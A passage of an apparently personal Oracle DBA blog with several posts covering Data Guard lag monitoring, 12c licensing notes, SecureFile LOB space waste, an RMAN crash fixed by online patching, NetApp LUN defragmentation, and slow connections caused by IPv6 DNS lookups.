This has certain repercussions: to monitor standby lag properly, you first need to locate the MRP0 process and then query that instance for v$dataguard_stats via a dedicated connection. Taking shortcuts through gv$dataguard_stats might return false results. Another question is why such a (buggy, in my opinion) view was introduced at all if it adds no value.
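A safer monitoring pattern, sketched below, first locates the applying instance and only then queries it over a dedicated, instance-specific connection (the connect step itself is left to your TNS setup):

```sql
-- 1) find the instance currently running managed recovery
SELECT inst_id, process, status
  FROM gv$managed_standby
 WHERE process = 'MRP0';

-- 2) connected directly to that instance, trust only its local view
SELECT name, value
  FROM v$dataguard_stats
 WHERE name IN ('transport lag', 'apply lag', 'apply finish time');
```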


Oracle Database 12.1c released. Licensing gotchas

Wednesday, June 26th, 2013

According to Oracle® Database Licensing Information 12c Release 1 (12.1) there are some gotchas, but also features that one would have reasonably expected to be included in the “basic” Enterprise Edition. The most interesting list for me is as follows:

  • Multitenant (the CDB/PDB stuff) is an additional paid option.
  • ILM/Heat Maps/Automatic Data Optimization belong to the Advanced Compression Option.
  • DataGuard Far Sync (a semi bunker-site, like SRDF/A* in the EMC Symmetrix/VMAX solution) is licensed as follows: Far sync instances are part of the Oracle Active Data Guard Far Sync feature, which requires an Oracle Active Data Guard license. (..) A far sync instance consumes very little disk and processing resources, yet provides the ability to failover to a terminal destination with zero data loss, as well as offload the primary database of other types of overhead (for example, redo transport). You would guess they charge additionally for the number of cores on the lightweight (in terms of storage capacity and CPU) proxy instance – WRONG! Here it is stated that The far sync instance can be installed and used on a server different from the server where the Oracle Database is installed and used. It is not necessary to obtain a separate license for the server running the far sync instance.
  • Oracle Flex ASM and Oracle Flex Cluster – this is a mystery to me
  • Oracle Clusterware may be used to protect any application (restarting or failing over the application in the event of a failure) on any server, free of charge. Oracle will provide support for Clusterware only if the server is running an Oracle product, which may include Oracle Linux or Oracle Solaris, that is also under Oracle support.
  • There is also an interesting statement: As of the release of Oracle Database 12c, network encryption (native network encryption and SSL/TLS) and strong authentication services (Kerberos, PKI, and RADIUS) are no longer part of Oracle Advanced Security and are available in all licensed editions of the Oracle database. Finally! No excuses for not encrypting your sensitive connections! Wait… yeah, it means more CPU usage, especially on the (Oracle) CPU-licensed side ;)

Part 2: Oracle SecureFile LOB is better than BasicFile, isn’t it?

Tuesday, June 18th, 2013

So we start with a real-life example of using SecureFiles (without deduplication and without encryption) on a large-scale system (say no-no to “laptop database” tests), running non-RAC Oracle (yup, a pretty old release, but the DB has already been migrated since this info was gathered):

primary:sys@XXXX> desc YYYYYYYY.magic_table;
 Name                                                  Null?    Type
 HEADERS                                                        BLOB
 PAYLOAD                                                        BLOB

primary:sys@XXXX> select num_rows, blocks, AVG_ROW_LEN from dba_tables  where table_name='MAGIC_TABLE';

  NUM_ROWS     BLOCKS AVG_ROW_LEN
---------- ---------- -----------
   3791737     891649         204

The table is in an 8kB tablespace, so our MAGIC_TABLE with 2 LOB columns takes ~ 891649*8192/1024/1024/1024 =~ 6.8GB. We verify our math against the real usage shown by dba_segments:

primary:sys@XXXX> select bytes/1024/1024/1024 gb from dba_segments where segment_name='MAGIC_TABLE';


The value is pretty close to the standard Oracle theory, so we are OK so far. We proceed with analyzing what uses space in that table (we will concentrate on the single LOB for the PAYLOAD column, for simplicity):
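The inline/out-of-line breakdown below can be produced with a query along these lines (a sketch – the 3964-byte cutoff only approximates the maximum inline LOB size and is an assumption, not the exact test Oracle applies):

```sql
SELECT CASE
         WHEN dbms_lob.getlength(payload) <= 3964 THEN 'Inline'
         ELSE 'Out-of-line'
       END x,
       COUNT(*)
  FROM YYYYYYYY.magic_table
 GROUP BY CASE
            WHEN dbms_lob.getlength(payload) <= 3964 THEN 'Inline'
            ELSE 'Out-of-line'
          END;
```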


X             COUNT(*)
----------- ----------
Inline         3100800
Out-of-line     732826


FACT1: so 24% of rows have the PAYLOAD LOB stored out-of-line; “out-of-line” probably means a different place – let’s check it.

primary:sys@XXXX> SELECT table_name, column_name, segment_name, round(a.bytes/1024/1024,1) mb FROM dba_segments a
JOIN dba_lobs b USING (owner, segment_name) WHERE b.table_name LIKE 'MAGIC_TABLE%';

TABLE_NAME                     COLUMN_NAME          SEGMENT_NAME                           MB
------------------------------ -------------------- ------------------------------ ----------
MAGIC_TABLE                    HEADERS              SYS_LOB0000099004C00007$$              ,1
MAGIC_TABLE                    PAYLOAD              SYS_LOB0000099004C00008$$         1769095


FACT2: these 24% of rows take 1769095 MB (sic!), which means ~1.7TB consumed for just 1/4 of the rows.

primary:sys@XXXX> select table_name, tablespace_name, chunk, pctversion, retention, in_row, securefile, retention from dba_lobs where segment_name = 'SYS_LOB0000099004C00008$$';

TABLE_NAME                     TABLESPACE_NAME                     CHUNK PCTVERSION  RETENTION IN_ SEC  RETENTION
------------------------------ ------------------------------ ---------- ---------- ---------- --- --- ----------
MAGIC_TABLE                    LOB4K                                4096                       YES YES


FACT3: those 24% of rows have their data stored in a separate tablespace dedicated for LOBs, with a 4kB blocksize.

primary:sys@XXXX> SELECT CASE
  WHEN dbms_lob.getlength(payload) < 4*1024 THEN '<4kB'
  WHEN dbms_lob.getlength(payload) < 6*1024 THEN '<6kB'
  WHEN dbms_lob.getlength(payload) < 7*1024 THEN '<7kB'
  ELSE 'even bigger'
  END x,
  COUNT(*) cnt
FROM YYYYYYYY.magic_table
GROUP BY CASE
  WHEN dbms_lob.getlength(payload) < 4*1024 THEN '<4kB'
  WHEN dbms_lob.getlength(payload) < 6*1024 THEN '<6kB'
  WHEN dbms_lob.getlength(payload) < 7*1024 THEN '<7kB'
  ELSE 'even bigger'
  END;

X                  CNT
----------- ----------
<7kB                76
<4kB           3215841
<6kB            701916


We can double-check Oracle on its math here. There is not a single row in that table with a LOB entry bigger than 7kB, yet everything bigger than roughly 3600-3900 bytes (the maximum size for inline LOBs) is stored out-of-line in the LOB segment named SYS_LOB0000099004C00008$$, which is taking 1769095 MB (sic!).
So actually 701916+76 rows potentially consume 1769095 MB in datafiles, which gives us ~2.5MB of waste per row. This is a really heavy-duty OLTP table, which means lots of concurrent INSERT/UPDATE/DELETE activity. I’m not even sure the application responsible is doing updates against the PAYLOAD column; from my analysis it just inserts a row once (with the LOB, via JDBC) and deletes it some time later. All I can say about the application in scope is that it is “database interdependent”.

Let’s now calculate the theory behind the space usage (a.k.a. what should really be used if there were no overhead). The space used for the PAYLOAD column stored in the LOBSEGMENT should be:

  • 3215841 rows stored inline in the tablespace with the rest of the data; the table segment for MAGIC_TABLE already stores those 6.8GB, which contain the data for these 3215841 rows, so we can skip it
  • (701916+76) rows stored in the separate tablespace LOB4K; for rows bigger than 3600..3900 bytes this translates to at least 1 CHUNK (4kB) and at most 2 CHUNKs (8kB), because we have nothing bigger than 7kB; we can even assume the worse scenario that a single CHUNK (4kB) requires up to 2 blocks in the 4kB tablespace due to some overheads. So even in the worst case we have (701916+76)*4096*2/1024/1024/1024 =~ 5.36GB
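The arithmetic above can be double-checked straight from SQL*Plus:

```sql
SELECT round(891649*8192/1024/1024/1024, 1)   AS table_seg_gb,   -- ~6.8
       round(701992*4096*2/1024/1024/1024, 2) AS worst_case_gb,  -- ~5.36
       trunc(1769095/1024)                    AS actual_lob_gb   -- 1727
  FROM dual;
```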

So what we really have is 1727 GB used to store 5.36GB. Closing this part, I would like to give you an idea of how hard SecureFile LOB processing is for Oracle – they seem to have been struggling with it for a couple of years. The list of bugs for the 11.x series includes:


I’m certain you could find even more. Even the most recent SecureFiles are still being patched; bug 14176879 (“Extensive growth of Securefiles segments undergoing updates”) was fixed in the Critical Patch Update of April 2013.

To make it even more appealing to use SecureFiles (irony intended), here’s the next real BIG THING: in the section “Using ALTER TABLE with SecureFiles LOBs” of the official documentation it is written: “Note that the SHRINK option is not supported for SecureFiles LOBs”. Yeah, now you can scream ;)

Part 1: Oracle SecureFile LOB is better than BasicFile, isn’t it?

Thursday, June 6th, 2013

According to Oracle Technical Marketing, SecureFiles are superior in every way to the older BasicFile LOB implementation. Part 1 of this series is going to try to prove it for strictly OLTP-like workloads (having a LOB column as a requirement for an application doing lots of short & quick transactions that need to store data the VARCHAR2 type cannot hold). This series is not going to concentrate on LOBs bigger than 5300 bytes. We also want to profit from the LOB inline storage option that stores LOB data together with the table data. The benchmarks were performed on a 2-socket, 8-core Intel Xeon box running Oracle with some local RAID1 storage. Before each iteration the shared pool and buffer cache were flushed, a log switch was forced (BTW: the DB was running without archived redo logs) and dedicated tablespaces were recreated; the workload was parallel (as in OLTP), using 8 jobs hitting a single table to create (intended) contention, and each run was repeated at least 3 times to guarantee at least some kind of “repeatability”. The table was not partitioned and looked like this:

create table t_blob ( id number primary key, l1 clob ) tablespace blobs
lob ( l1 ) store as &blob_type (
tablespace blobs &inrow storage in row chunk &chunk &cache &logging
);

There are several variables, set like this:

  • &inrow – always “enable” for purposes of this test
  • &chunk – always set for 4k for purposes of this test
  • &cache – always set to CACHE
  • &logging – always set
  • &blob_type – securefile, basicfile
  • tablespace – the tested values were 4k and 8k, each time setting the appropriate db_Nk_cache_size buffer to 1.5GB
  • payload for LOB data – always generated randomly using the dbms_random package, with lengths from a minimum of 300 bytes up to 5300 bytes (incremented in steps of 2000 bytes)
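With those variables substituted, a single SecureFile iteration of the template expands to something like this (a sketch using the values listed above):

```sql
create table t_blob ( id number primary key, l1 clob ) tablespace blobs
lob ( l1 ) store as securefile (
  tablespace blobs enable storage in row chunk 4096 cache logging
);
```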

The results are below; first, the space efficiency of BasicFile vs SecureFile:

Second, the elapsed execution time of BasicFile vs SecureFile:

But that’s not the end – stay tuned for part 2, where I’ll show that the world is not as beautiful as it looks :)


Oracle online patching for bug 13817131 (backport for ORA-7445 near ksfqfcrx()+X during RMAN backups)

Wednesday, October 3rd, 2012

Oracle seems to be affected sometimes (the bug manifests itself only in highly utilized environments, as per my observations) by an ORA-7445 during RMAN backups. The first symptoms look like this in the RMAN log:
channel t1: starting piece 1 at 17-SEP-12
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03009: failure of backup command on t1 channel at 09/17/2012 16:01:23
RMAN-10038: database session for channel t1 terminated unexpectedly

The alert log contains information that incident has been registered and the most interesting entry is this:
ORA-07445: exception encountered: core dump [ksfqfcrx()+1143] [SIGSEGV] [ADDR:0x8] [PC:0xA3E2E3] [Address not mapped to object] []

Starting from this point, sooner or later all RMAN backups are going to fail; my observation is that it is only a matter of time. RAC gives some additional headroom, because one can switch backups over to the next node, but please be advised that since some kind of memory corruption is going on, it will eventually happen on the next nodes too. You need to patch it.

The GDB backtrace shows exactly the failing function:

(gdb) where
#0 0x0000003513630285 in raise () from /lib64/
#1 0x0000003513631d30 in abort () from /lib64/
#2 0x0000000008130445 in skgdbgcra ()
#3 0x00000000067a67f1 in sksdbgcra ()
#4 0x0000000004977828 in ksdbgcra ()
#5 0x000000000679e3a5 in ssexhd ()
#6 <signal handler called>
#7 0x0000000000a3e2e3 in ksfqfcrx ()
#8 0x0000000007018463 in krbbOpenOutput ()
#9 0x000000000702afe7 in krbbpcint ()
#10 0x000000000702e393 in krbbpc ()
#11 0x0000000008a47cea in krbibpc ()
#12 0x00000000093f8131 in pevm_icd_call_common ()
#13 0x00000000093ed460 in pfrinstr_ICAL ()
#14 0x00000000093f10b9 in pfrrun_no_tool ()
#15 0x00000000093ef78d in pfrrun ()
#31 0x0000000001dc0d14 in ssthrdmain ()
#32 0x0000000000a0b271 in main ()
(gdb) ... several "up" cmds to get to the #6 stack frame
(gdb) info registers rax r12
rax 0x0 0
r12 0x7fd3ac78bf20 140547108421408
(gdb) disas
0x0000000000a3e2d6 <ksfqfcrx+1130>: callq 0x4838ada <ksfq_ibuf>
0x0000000000a3e2db <ksfqfcrx+1135>: mov 0xcd0(%r12),%rax <--- loads %rax from memory at %r12+0xcd0
0x0000000000a3e2e3 <ksfqfcrx+1143>: orl $0x4,0x8(%rax) <--- crash: %rax is 0 and the instruction dereferences %rax + 8 (SEGV)
0x0000000000a3e2e7 <ksfqfcrx+1147>: jmpq 0xa3e0bc <ksfqfcrx+592>

More or less, the issue is documented under Oracle Support note 1482775.1 and the only workaround is to upgrade to 12.1 or – which is a little joke (we all know that 12.1 is going to be such a great database version that it won’t have even a single bug… all is fixed in 12.1 ;) ). Now, in my opinion, one has several options:

  1. you agree to lose backups of mission-critical production envs (change the RMAN ARCHIVELOG DELETION POLICY to NONE?) or fall back to backups taken on the DataGuard standby (delete force archivelog is your friend… or enemy, actually ;) )
  2. fall back to the remaining RAC nodes and restart one of them… (restarting instances seems to avoid the problem for some time)
  3. do nothing and have downtime (due to the ARCH stuck problem and the FRA filling up)
  4. request a backport for the bug mentioned in 1482775.1
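For option 1, the deletion-policy change is a one-liner in RMAN (illustrative only – think twice before loosening archivelog deletion on a production system):

```sql
RMAN> CONFIGURE ARCHIVELOG DELETION POLICY TO NONE;
# ...and once patched, back to a standby-aware policy:
RMAN> CONFIGURE ARCHIVELOG DELETION POLICY TO APPLIED ON ALL STANDBY;
```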

We went with options 2 + 4. Later I raised an escalation call for the SR we had opened initially. Several days later we had a patch ready to be applied; the nice thing about it (patch 13817131) was that it could be applied completely online, even on RAC (no need to shut down anything) – just live memory patching! Here are the details from the lab:

[oracle@labr2 13817131]$ opatch apply online -connectString ORCL2:::labr1,ORCL1:::labr2
Oracle Interim Patch Installer version
Copyright (c) 2012, Oracle Corporation.  All rights reserved.

Oracle Home       : /u01/app/oracle/product/11.2.0/dbhome_1
Central Inventory : /u01/app/oraInventory
   from           : /u01/app/oracle/product/11.2.0/dbhome_1/oraInst.loc
OPatch version    :
OUI version       :
Log file location : /u01/app/oracle/product/11.2.0/dbhome_1/cfgtoollogs/opatch/13817131_Sep_27_2012_12_55_35/apply2012-09-27_12-55-35PM_1.log

The patch should be applied/rolled back in '-all_nodes' mode only.
Converting the RAC mode to '-all_nodes' mode.
Applying interim patch '13817131' to OH '/u01/app/oracle/product/11.2.0/dbhome_1'
Verifying environment and performing prerequisite checks...
All checks passed.
Backing up files...

Patching component oracle.rdbms,
Installing and enabling the online patch 'bug13817131.pch', on database 'ORCL1'.

Verifying the update...

Patching in all-node mode.

Updating nodes 'labr1'
   Apply-related files are:
     FP = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_files.txt"
     DP = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_dirs.txt"
     MP = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/make_cmds.txt"
     RC = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/remote_cmds.txt"

Instantiating the file "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_files.txt.instantiated" by replacing $ORACLE_HOME in "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_files.txt" with actual path.
Propagating files to remote nodes...
Instantiating the file "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_dirs.txt.instantiated" by replacing $ORACLE_HOME in "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_dirs.txt" with actual path.
Propagating directories to remote nodes...
Installing and enabling the online patch 'bug13817131.pch', on database 'ORCL2' on node 'labr1'.

Patch 13817131 successfully applied
Log file location: /u01/app/oracle/product/11.2.0/dbhome_1/cfgtoollogs/opatch/13817131_Sep_27_2012_12_55_35/apply2012-09-27_12-55-35PM_1.log

OPatch succeeded.
[oracle@labr2 13817131]$

Meanwhile, in the alert log:
Thu Sep 27 12:56:09 2012
Patch file bug13817131.pch is out of sync with oracle binary; performing fixup
Patch file bug13817131.pch has been synced with oracle binary
Patch bug13817131.pch Installed – Update #1
Patch bug13817131.pch Enabled – Update #2
Thu Sep 27 12:56:11 2012
Online patch bug13817131.pch has been installed
Online patch bug13817131.pch has been enabled

Technical details follow. As you can see, the dynamic library is added without any interruption to the running binaries; probably some functions are also redirected to this dynamic library:

[root@labr2 ~]# ps -ef | grep pmon
oracle    2618     1  0 11:29 ?        00:00:01 asm_pmon_+ASM1
oracle    3013     1  0 11:30 ?        00:00:01 ora_pmon_ORCL1
root      4947  3844  0 13:02 pts/0    00:00:00 grep pmon
[root@labr2 ~]# lsof -p 3013 |grep bug
oracle  3013 oracle  mem    REG             202,17    217221 1183112 /u01/app/oracle/product/11.2.0/dbhome_1/hpatch/
[root@labr2 ~]#
[root@labr2 ~]# pmap -d 3013|grep bug
00007fcb51e8c000     168 r-x-- 0000000000000000 0ca:00011
00007fcb51eb6000    1020 ----- 000000000002a000 0ca:00011
00007fcb51fb5000      12 rwx-- 0000000000029000 0ca:00011
[root@labr2 ~]#

WAFL performance VS sequential reads: part II, FC LUN defragmentation

Monday, June 27th, 2011

After part I – where I simulated a typical Oracle workload (generating a 70:30 read-to-write ratio on the FC LUN) and created snapshots – I wanted to try different performance tests. In order to start from the same characteristics I deleted all my snapshots, so my FlexVol ended up again at 40% utilization:

X> snap list full_aggr_test
Volume full_aggr_test

No snapshots exist.
X> df -g full_aggr_test
Filesystem               total       used      avail capacity  Mounted on
/vol/full_aggr_test/       50GB       20GB       29GB      40%  /vol/full_aggr_test/
/vol/full_aggr_test/.snapshot        0GB        0GB        0GB     ---%  /vol/full_aggr_test/.snapshot

Later I executed the Orion stress test in a way identical to part I, on the same environment. As you can see, the LUN is still fragmented, because any kind of sequential read is impacted (maximum read observed ~17MB/s):

root@Y:# grep Maximum orion*
orion_20110627_1116_summary.txt:Maximum Large MBPS=17.07 @ Small=0 and Large=9
orion_20110627_1116_summary.txt:Maximum Small IOPS=683 @ Small=24 and Large=0

So in order to fight this performance issue one can first establish the root cause:

X> reallocate measure /vol/full_aggr_test
Reallocation scan will be started on '/vol/full_aggr_test'.
Monitor the system log for results.

System log will reveal this:

Mon Jun 27 07:35:31 EDT [X: wafl.scan.start:info]: Starting WAFL layout measurement on volume full_aggr_test.
Mon Jun 27 07:35:32 EDT [X: wafl.reallocate.check.highAdvise:info]: Allocation check on '/vol/full_aggr_test' is 8, hotspot 0 (threshold 4), consider running reallocate.

This seems to be identical to running measure on the LUN:

X> reallocate measure  /vol/full_aggr_test/lun01
Reallocation scan will be started on '/vol/full_aggr_test/lun01'.
Monitor the system log for results.

Log will show this:

Mon Jun 27 07:45:21 EDT [X: wafl.scan.start:info]: Starting WAFL layout measurement on volume full_aggr_test.
Mon Jun 27 07:45:21 EDT [X: wafl.reallocate.check.highAdvise:info]: Allocation check on '/vol/full_aggr_test/lun01' is 8, hotspot 0 (threshold 4), consider running reallocate.

So in both cases we are advised to defragment the LUN; keep in mind, though, that this is a rather resource-hungry operation, as it may involve reading and rewriting the full contents of the data!

X> reallocate start -f -p /vol/full_aggr_test/lun01
Reallocation scan will be started on '/vol/full_aggr_test/lun01'.
Monitor the system log for results.

Log will show that the operation has started …

Mon Jun 27 07:46:23 EDT [X:]: The aggregate 'sm_aggr1' contains blocks that require redirection; 'revert_to' might take longer than expected.
Mon Jun 27 07:46:23 EDT [X: wafl.scan.start:info]: Starting file reallocating on volume full_aggr_test.

As you can see, it causes rather low CPU activity; however, the physical utilization of the disks is reported as high (don’t be fooled by the low write activity – it is a function of time, and a lot of writes are performed later):

 CPU   NFS  CIFS  HTTP   Total    Net kB/s   Disk kB/s     Tape kB/s Cache Cache  CP   CP Disk    FCP iSCSI   FCP  kB/s iSCSI  kB/s
                                  in   out   read  write  read write   age   hit time  ty util                 in   out    in   out
 10%     0     0     0     157     0     0  22372  19320     0     0    53s  94%  58%  :   97%    156     0   589   175     0     0
 10%     1     0     0     108     0     0  24884      0     0     0    53s  94%   0%  -   92%    106     0   256   585     0     0
  9%     0     0     0     101     0     0  25284     24     0     0    53s  94%   0%  -   93%    100     0   421   260     0     0
 12%     0     0     0     627    20    25  25620      8     0     0    53s  94%   0%  -   92%    511     0   297   132     0     0
 11%     0     0     0     792     0     0  22832      0     0     0    53s  94%   0%  -   90%    652     0   670   461     0     0
  6%     1     0     0      81     1     1  25232     24     0     0    53s  99%   0%  -   92%     78     0   233   253     0     0

One can monitor the progress using the “status” command and observe when the scan goes idle:

X> reallocate status -v /vol/full_aggr_test/lun01
Reallocation scans are on
        State: Reallocating: Block 1347456 of 5242880 (25%), updated 1346434
        Flags: doing_force,measure_only,repeat,keep_vvbn
    Threshold: 4
     Schedule: n/a
     Interval: 1 day
 Optimization: 8
  Measure Log: n/a
X> reallocate status -v /vol/full_aggr_test/lun01
Reallocation scans are on
        State: Idle
        Flags: measure_only,repeat
    Threshold: 4
     Schedule: n/a
     Interval: 1 day
 Optimization: 8
  Measure Log: n/a

X> sysstat -x 1
 CPU   NFS  CIFS  HTTP   Total    Net kB/s   Disk kB/s     Tape kB/s Cache Cache  CP   CP Disk    FCP iSCSI   FCP  kB/s iSCSI  kB/s
                                  in   out   read  write  read write   age   hit time  ty util                 in   out    in   out
 53%     1     0     0     678     1     1  29428   1556     0     0     1   72%   9%  :   11%    573     0   311 21077     0     0
 34%     0     0     0     443     0     0  22028     32     0     0     1   78%   0%  -    5%    442     0  1068 20121     0     0
 40%     0     0     0     172     0     0  16360      0     0     0     1   77%   0%  -    4%    171     0   367 14450     0     0

Later results indicate that sequential reads are indeed back at their top value (~42MB/s), which was our starting point on the fresh FlexVol inside the LUN in part I…

root@Y:# grep Maximum orion*
orion_20110627_1208_summary.txt:Maximum Large MBPS=42.73 @ Small=0 and Large=9
orion_20110627_1208_summary.txt:Maximum Small IOPS=645 @ Small=25 and Large=0

In the next series I’ll try to investigate the various AIX JFS2/CIO behaviours and, to some degree, the performance characteristics of NetApp storage and its options (e.g. the read_realloc option). Stay tuned…

A pretty nice Oracle Exadata marketing video

Monday, June 27th, 2011

A nice video in “Shift Happens” style:

… now I’m wondering how it works in reality ;)

Long remote Oracle/SQLNet connection times due to the IPv6 enabled on RHEL 5.x

Sunday, January 9th, 2011

On one of my RAC clusters in the lab I noticed that it sometimes took up to 5-15 seconds to connect to the Oracle database instead of a maximum of 1s. It was happening on some old VMs back from 2008. The root-cause analysis showed that each RAC node was doing a DNS search for its own name, which is something I wouldn’t normally expect. Paying attention to the details showed that Oracle RDBMS was performing a DNS lookup of its own server name – not for the A DNS entry, but for AAAA (IPv6). Yes, libc (the DNS resolver) was asking REMOTE DNS SERVERS for its own server name – but in IPv6 format (AAAA) – because it couldn’t find the required info via /etc/hosts. This is going to happen even with NETWORKING_IPV6=OFF in /etc/sysconfig/network.

The solution was pretty easy after establishing the root cause. Just ensure that:

  • all RAC nodes are in /etc/hosts
  • all RAC nodes’ fully qualified names (node.domain) are in /etc/hosts
  • resolv.conf provides at least 2-3 DNS servers that are reachable within max 50ms (check each one with dig(1)); resolv.conf can have options to perform round robin across those [my environment was affected by this]
  • you have disabled IPv6 via NETWORKING_IPV6
  • you have aliased IPv6 to “off” in the kernel modules to completely disable the ipv6 kernel functionality, which in turn also disables any libc IPv6 action [my environment was affected by this; just add "alias net-pf-10 off" to modprobe.conf]
  • lsmod does NOT display ipv6 (the kernel module is not loaded)

Of course, as you can see, I wouldn’t have been affected by this one if the DNS name servers hadn’t been misconfigured in the first place (my lab in 2008 looked different than it does now).